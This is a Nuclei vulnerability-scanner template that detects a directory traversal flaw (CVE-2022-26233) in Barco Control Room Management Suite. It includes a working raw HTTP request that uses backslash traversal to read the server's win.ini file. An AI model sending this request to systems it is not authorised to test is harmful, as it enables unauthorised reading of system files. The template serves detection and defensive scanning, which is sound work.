# Nuclei detection template for CVE-2022-26233 (CWE-22, path traversal) in
# Barco Control Room Management Suite. It requests a fixed, non-sensitive
# Windows file through a backslash traversal path and reports a finding only
# when the response body carries markers of that file.
id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite - Directory Traversal
  author: 0x_Akoko
  severity: high
  # Folded scalar: the lines below join into the same single-line string.
  description: >-
    Barco Control Room Management through Suite 2.9 Build 0275 was discovered
    to be vulnerable to directory traversal, allowing attackers to access
    sensitive information and components. Requests must begin with the
    "GET /..\.." substring.
  reference:
    - https://0day.today/exploit/37579
    - https://www.cvedetails.com/cve/CVE-2022-26233
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
  classification:
    # Vector reads: reachable over the network, low complexity, no privileges
    # and no user interaction; impact is confidentiality only (C:H/I:N/A:N).
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
  tags: cve,cve2022,barco,lfi

requests:
  # The request is written out raw and sent with `unsafe: true`, so the
  # client does not normalise the path; per the description above, the
  # request line has to start with "GET /..\.." for the issue to show.
  # The `|+` (keep) chomping indicator preserves the trailing blank line,
  # which ends the HTTP header section.
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      # All three words must be present in the body (condition: and).
      # NOTE(review): the strings look like the usual win.ini markers;
      # "fonts" and "extensions" are generic on their own, so the AND with
      # "bit app support" is what keeps false positives down. There is no
      # status-code matcher: the body check alone decides the result.
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and